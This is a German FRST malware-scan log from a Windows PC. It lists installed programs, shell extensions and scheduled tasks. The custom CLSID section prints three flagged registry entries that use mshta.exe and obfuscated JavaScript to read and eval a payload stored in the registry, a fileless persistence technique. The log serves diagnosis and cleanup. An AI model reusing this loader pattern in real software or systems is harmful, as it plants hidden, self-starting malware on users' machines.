Java 8 Update 144 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180144F0}) (Version: 8.0.1440.1 - Oracle Corporation)
KCD Beta Access (HKLM-x32\...\{d2fb0ffd-876a-49ad-a428-fbb255d5d8d2}) (Version: 4.0 - Warhorse Studios)
KCD Beta Access (HKLM-x32\...\{FD95EDF6-7B9F-4BD1-8DAD-63D8BDD45B96}) (Version: 4.0 - Warhorse Studios) Hidden
League of Legends (HKLM-x32\...\{517CC397-B22F-4593-8DCB-DE72CC541E9A}) (Version: 3.0.1 - Riot Games ) Hidden
League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games )
LEGO® Der Herr der Ringe™ (HKLM-x32\...\{C6F20FA7-342A-47A9-A3C8-EB36CABE6419}) (Version: 1.0.0.0 - Warner Bros. Interactive Entertainment)
Logitech Gaming Software 8.92 (HKLM\...\Logitech Gaming Software) (Version: 8.92.67 - Logitech Inc.)
Logitech SetPoint 6.67 (HKLM\...\sp6) (Version: 6.67.83 - Logitech)
Logitech Webcam-Software (HKLM-x32\...\{D40EB009-0499-459c-A8AF-C9C110766215}) (Version: 2.80 - Logitech Inc.)
Manager (HKLM-x32\...\{2D00EBC4-DD22-4F5B-9BA1-F98ED2C6FCF2}) (Version: 5.0.15.31893 - 2017 pdfforge GmbH. All rights reserved) Hidden
Master of Orion (HKLM\...\Steam App 298050) (Version:  - NGD Studios)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{F2508213-9989-4E85-A078-72BE483917EF}) (Version: 3.5.88.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation)
Microsoft LifeCam (HKLM\...\{5CE7E3F5-9803-4F32-AA89-2D8848A80109}) (Version: 3.60.253.0 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{3c3aafc8-d898-43ec-998f-965ffdae065a}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Minion (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\{Minion}}_is1) (Version: 3.0 - Good Game Mods LLC)
Mordheim: City of the Damned (HKLM-x32\...\Steam App 276810) (Version:  - Rogue Factor)
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
MyPhoneExplorer (HKLM-x32\...\MPE) (Version: 1.8.8 - F.J. Wechselberger)
No Man's Sky (HKLM\...\Steam App 275850) (Version:  - Hello Games)
NVIDIA 3D Vision Controller-Treiber 369.04 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 369.04 - NVIDIA Corporation)
NVIDIA 3D Vision Treiber 384.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 384.94 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.8.0.89 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.8.0.89 - NVIDIA Corporation)
NVIDIA Grafiktreiber 384.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 384.94 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.34.27 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.27 - NVIDIA Corporation)
NVIDIA Miracast Virtueller Ton 355.82 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Miracast.VirtualAudio) (Version: 355.82 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
NvvHci (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvvHci) (Version: 2.02.0.5 - NVIDIA Corporation) Hidden
OLYMPUS Digital Camera Updater (HKLM-x32\...\{962428F4-2E99-4AD2-B55D-B468C18A8A89}) (Version: 2.0.0 - Olympus Corporation)
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
OpenOffice 4.1.3 (HKLM-x32\...\{8D5FCC56-BB9F-4122-923C-71753F50F6F5}) (Version: 4.13.9783 - Apache Software Foundation)
Origin (HKLM-x32\...\Origin) (Version: 10.4.16.25850 - Electronic Arts, Inc.)
Platform (HKLM-x32\...\{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.42 - VIA Technologies, Inc.) Hidden
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.991 - Even Balance, Inc.)
Qualcomm Atheros 11AC Drivers (HKLM\...\{45724D31-7270-4A0B-B236-5119CFDA42DB}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden
Qualcomm Atheros 61x4 Bluetooth Suite (64) (HKLM\...\{628988B4-3FA5-4EA6-BAA3-DA640F6718BD}) (Version: 3.0.0.357 - Qualcomm Atheros)
Qualcomm Atheros Bandwidth Control Filter Driver (HKLM\...\{42F56083-A726-4599-A231-EF6200A39AF6}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden
Qualcomm Atheros Killer E220x Drivers (HKLM\...\{1CC47E9F-A34A-44B3-8C5A-D45C1A3CB94C}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden
Qualcomm Atheros Killer Performance Suite (HKLM-x32\...\{E70DB50B-10B4-46BC-9DE2-AB8B49E061EE}) (Version: 1.1.47.1058 - Qualcomm Atheros)
Qualcomm Atheros Network Manager (HKLM\...\{A32F7F52-0DC5-40EF-84BD-7D30CC20D157}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden
Rayman Origins (HKLM-x32\...\Uplay Install 80) (Version:  - Ubisoft)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8036 - Realtek Semiconductor Corp.)
Revo Uninstaller 2.0.3 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.3 - VS Revo Group, Ltd.)
Rise of the Tomb Raider (HKLM\...\Steam App 391220) (Version:  - Crystal Dynamics)
Samsung Kies (HKLM-x32\...\{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.4.16113.3 - Samsung Electronics Co., Ltd.) Hidden
Samsung Kies (HKLM-x32\...\InstallShield_{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.4.16113.3 - Samsung Electronics Co., Ltd.)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.)
SimCity™ (HKLM-x32\...\{F70FDE4B-8F86-4eb6-8C8E-636EC89F6419}) (Version: 4.0.98.0213 - Electronic Arts)
Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
Skype Web Plugin (HKLM-x32\...\{E8A70371-2C4D-4B12-831D-6A4BB9AC7AEF}) (Version: 7.29.0.73 - Skype Technologies S.A.)
Skype™ 7.38 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.38.101 - Skype Technologies S.A.)
Smart Switch (HKLM-x32\...\{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17054.16 - Samsung Electronics Co., Ltd.) Hidden
Smart Switch (HKLM-x32\...\InstallShield_{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17054.16 - Samsung Electronics Co., Ltd.)
Smart Technology Programming Software 7.0.27.13 (HKLM\...\{C9193CBB-C31A-412A-A074-AD08F0F2CF3D}) (Version: 7.0.27.13 - Mad Catz)
Smite (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF017}) (Version: 4.14.4229.4 - Hi-Rez Studios)
Spotify (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Spotify) (Version: 1.0.53.758.gde3fc4b2 - Spotify AB)
Star Citizen Launcher (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Star Citizen Launcher) (Version: 00.01.00.00 - Cloud Imperium Games)
STAR WARS™ Battlefront™ (HKLM-x32\...\{E402D891-4E45-4ce9-B41F-DD35864EF170}) (Version: 1.0.7.64833 - Electronic Arts)
StarCraft II (HKLM-x32\...\StarCraft II) (Version:  - Blizzard Entertainment)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Steuer St.Gallen 2016 nP 1.6.0 (HKLM-x32\...\0222-4883-7289-1667) (Version: 1.6.0 - Information Factory AG)
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
Terraria (HKLM-x32\...\Steam App 105600) (Version:  - Re-Logic)
The Elder Scrolls Online (HKLM-x32\...\The Elder Scrolls Online) (Version: 1.0.0.0 - Zenimax Online Studios)
The Long Dark (HKLM\...\Steam App 305620) (Version:  - Hinterland Studio Inc.)
The Witcher 3 - Wild Hunt (HKLM-x32\...\1207664643_is1) (Version: 1.31.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Blood and Wine (HKLM-x32\...\Blood and Wine_is1) (Version: 1.24.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Free DLC program (16 DLC) (HKLM-x32\...\Free DLC program (16 DLC)_is1) (Version: 1.24.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Hearts of Stone (HKLM-x32\...\Hearts of Stone_is1) (Version: 1.24.0.0 - GOG.com)
Tom Clancy's The Division (HKLM\...\Steam App 365590) (Version:  - Massive Entertainment)
TomTom MyDrive Connect 4.1.5.3181 (HKLM-x32\...\MyDriveConnect) (Version: 4.1.5.3181 - TomTom)
Total War™: WARHAMMER® (HKLM\...\Steam App 364360) (Version:  - Creative Assembly)
Tyranny (HKLM\...\Steam App 362960) (Version:  - Obsidian Entertainment)
Uplay (HKLM-x32\...\Uplay) (Version: 5.1 - Ubisoft)
VIA Plattform-Geräte-Manager (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.42 - VIA Technologies, Inc.)
Visual Studio C++ 10.0 Runtime (HKLM-x32\...\{4412F224-3849-4461-A3E9-DEEF8D252790}) (Version: 10.0.0 - TomTom International B.V.)
VoiceAttack (HKLM-x32\...\{75E13F4F-139E-4CCA-A5A5-7476E4C5484D}) (Version: 1.4 - VoiceAttack.com)
Vulkan Run Time Libraries 1.0.3.0 (HKLM\...\VulkanRT1.0.3.0) (Version: 1.0.3.0 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.42.1 (HKLM\...\VulkanRT1.0.42.1) (Version: 1.0.42.1 - LunarG, Inc.)
Warframe (HKLM-x32\...\{EE130AB8-143A-4AA2-B81A-79EC1623C899}) (Version: 1.0.0 - Digital Extremes)
Warhammer 40,000: Dawn of War III (HKLM\...\Steam App 285190) (Version:  - Relic Entertainment)
Warhammer: End Times - Vermintide (HKLM\...\Steam App 235540) (Version:  - Fatshark)
WestwoodOnline (HKLM-x32\...\{BBCD6D56-8A26-4DDE-9482-DBC9C7B7341D}) (Version:  - )
Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation)
Wolfenstein: The New Order German Edition (HKLM-x32\...\Steam App 288570) (Version:  - MachineGames)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\*****\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{A03A51A2-5B59-4ECE-96D1-037F7F2A0D8F}\localserver32 -> C:\Users\*****\AppData\Local\SkypePlugin\7.29.0.73\GatewayVersion-x64.exe (Skype Technologies S.A.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{CBF9CD8C-2714-4F36-B76A-43E6C7547BC2}\localserver32 -> C:\Users\*****\AppData\Local\SkypePlugin\7.29.0.73\EdgeCalling.exe (Skype Technologies S.A.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\*****\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EE1-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EE2-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FBC9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FE0A3EA9-4DDA-4B0A-9981-5ABE8F0186CD}\InprocServer32 -> C:\Users\*****\AppData\Local\SkypePlugin\7.29.0.73\GatewayActiveX-x64.dll (Skype Technologies S.A.)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\5b53a: "C:\WINDOWS\system32\mshta.exe" "javascript:S5lrz="f310qYGw";Vo0=new ActiveXObject("WScript.Shell");ou8rBoG="TXQ";EKfm37=Vo0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");EFQEQ1s="B1036niD";eval(EKfm37);phzPz7y7="m";" <==== ACHTUNG
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\qofqow: "C:\WINDOWS\system32\mshta.exe" "javascript:qCMtl0iJ="KTSd4";Zc0=new ActiveXObject("WScript.Shell");PaNndH09="ye7m06u";uOK7n=Zc0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");fbZu1="pzwHtm";eval(uOK7n);CXc9F7L="bpC";" <==== ACHTUNG
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\uwas: cmd.exe /c start "" "C:\Users\*****\AppData\Local\Wqy He\xfoqedfutx.hnen" "javascript:np5aj="n";j6Q0=new ActiveXObject("WScript.Shell");CJH0m="XMmT";Ku05Ci=j6Q0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");JQo0Sr="6SpeO0";eval(Ku05Ci);dYlGfd3="bB6tEkG";" <==== ACHTUNG
ShellIconOverlayIdentifiers: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)
ContextMenuHandlers1: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} =>  -> Keine Datei
ContextMenuHandlers1-x32: [MyPhoneExplorer] -> {A372C6DF-7A85-41B1-B3B0-D1E24073DCBF} => G:\Program Files (x86)\MyPhoneExplorer\DLL\ShellMgr.dll [2010-03-30] (F.J. Wechselberger)
ContextMenuHandlers1-x32: [PDFCreator.ShellContextMenu] -> {d9cea52e-100d-4159-89ea-76e845bc13e1} =>  -> Keine Datei
ContextMenuHandlers4: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} =>  -> Keine Datei
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-07-19] (NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} =>  -> Keine Datei
ContextMenuHandlers6: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} =>  -> Keine Datei
ContextMenuHandlers1_S-1-5-21-1566530412-1856523912-1524002813-1001: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)
ContextMenuHandlers4_S-1-5-21-1566530412-1856523912-1524002813-1001: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)
ContextMenuHandlers5_S-1-5-21-1566530412-1856523912-1524002813-1001: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {0317339D-827C-47F3-91C4-7324B9D0FA87} - System32\Tasks\{A380CFB5-96EE-4AD0-A8F5-D66D9C86A514} => C:\WINDOWS\system32\pcalua.exe -a "G:\Program Files (x86)\PurpleHills\The Treasures of Mystery Island 3 - Das Geisterschiff\The Treasures of Mystery Island - Das Geisterschiff.exe" -d "G:\Program Files (x86)\PurpleHills\The Treasures of Mystery Island 3 - Das Geisterschiff"
Task: {057EAF51-6043-4A2C-8C62-FA5066DFA7DE} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {189B4981-5161-4573-95FB-914ABF5857A2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {1B266482-966D-4C9C-A722-E1BEFB5D28B0} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-01] (Google Inc.)
Task: {2BFDCC5F-5F70-4BDA-8D57-85BB365542CA} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {2C71CB98-75B2-4838-9B99-8BB2257CEC5B} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => C:\WINDOWS\System32\AutoWorkplace.exe
Task: {3BD02220-2F87-42CC-B767-EECC4E9F9601} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.)
Task: {3C37C677-69CD-441A-8D47-EEB67B7220B5} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-07-26] (NVIDIA Corporation)
Task: {41006DFD-D327-4048-9208-BB616205BF64} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {43681C05-5E15-43E2-93BB-8585D47F91E4} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG
Task: {46ECB298-DE9D-4F8C-A5C9-75A7C20EFE1F} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-06-30] (Piriform Ltd)
Task: {4C001B95-7BB8-481D-BBD9-D9E3DEF59DFE} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-07-26] (NVIDIA Corporation)
Task: {50222EEB-D09E-4AF2-A9C7-16E8BA809C5C} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-07-11] (Microsoft Corporation)
Task: {54193568-FA18-42AA-AA36-72AE0A69F1CE} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG
Task: {5695EF73-2130-43FB-B248-51C430A387A4} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-07-26] (NVIDIA Corporation)
Task: {577763E4-17E6-4D07-A67F-13108AB9872D} - System32\Tasks\Uninstaller_Install_Martin_Walser => C:\Program Files (x86)\IObit\Advanced SystemCare\ActionCenterDownloader.exe
